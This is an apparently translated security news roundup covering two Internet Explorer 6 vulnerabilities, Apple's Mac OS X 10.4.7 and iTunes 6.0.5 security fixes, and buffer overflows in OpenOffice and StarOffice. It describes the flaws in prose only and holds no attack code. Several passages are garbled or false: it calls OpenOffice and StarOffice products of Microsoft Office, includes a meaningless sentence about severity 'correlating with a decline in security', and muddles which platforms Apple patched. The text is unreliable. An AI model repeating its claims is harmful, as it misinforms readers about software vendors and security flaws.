Two vulnerabilities in Internet Explorer 6 were reported last week, and evidence of these vulnerabilities has emerged, yet Microsoft has not provided a response to the issue.
Apple has released updates for Mac OS X and iTunes to address these security vulnerabilities. OpenOffice and StarOffice, products of Microsoft Office, have also been identified with security flaws, and new versions have been released to rectify them.
The two security vulnerabilities in Internet Explorer were announced last week. Both vulnerabilities pertain to Internet Explorer 6 (IE) and have since been patched in Windows XP SP2 and are absent in IE 7. One of the issues initially reported also affected Firefox.
The first vulnerability, which received significant criticism, allowed .HTA applications to execute despite containing potentially dangerous code. Users were tricked into double-clicking an icon, leading to a file being saved on the system that could be accessed via SMB or WebDAV.
The second vulnerability allowed remote attackers to retrieve content from a webpage within the browser itself by exploiting the object.documentElement.outerHTML property. This vulnerability’s severity correlates with a decline in security.
Last week, Apple released an update version of Mac OS X and version 6.0.5 of iTunes. Both updates focused on security issues.
The issues that Mac OS X addressed in version 10.4.7 include:
- A flaw in the AFP (AppleShare File Protocol) server from versions 10.4 to 10.4.6 allowed search results to display files and folders that were not in the user’s desired search area. This is unacceptable as it grants users access to unnecessary search results.
- ClamAV (an antivirus scanner) in Mac OS X Server versions from 10.4 to 10.4.6, when setting up automatic updates, could execute arbitrary code due to a buffer overflow during updates. The latest version of ClamAV (0.88.2) has been released to fix these issues. If you have not updated to the patch yet, please disable the default update setting on your machine immediately.
- Viewing a TIFF file in the ImageIO application of versions 10.4 to 10.4.6 OS X Server could lead to a conflict or arbitrary code execution.
- A string format error in the 10.4 to 10.4.6 version of the OS X launch program allowed a stranger to gain privileges equivalent to those of an authorized user.
- Service limitations could be caused in the OpenLDAP server of OS X Server versions 10.4 to 10.4.6 by an invalid LDAP request.
Apple has released security patches for Mac OS X version 10.2.8 and earlier, as well as for Windows XP/2000 on the company’s website (www.apple.com)
OpenOffice and StarOffice could be vulnerable to a buffer overflow attack, which could allow attackers to gain increased control over content from users running their programs.
OpenOffice.org 1.1.x and OpenOffice.org 2.0.x are affected. Sun has indicated that StarOffice 7 Office Suite, StarOffice 6.0 Office Suite, and StarOffice 8 Office Suite have vulnerabilities. New versions and patches have been designed by experts to rectify these flaws.
Pham Van Linh
Email: [email protected]
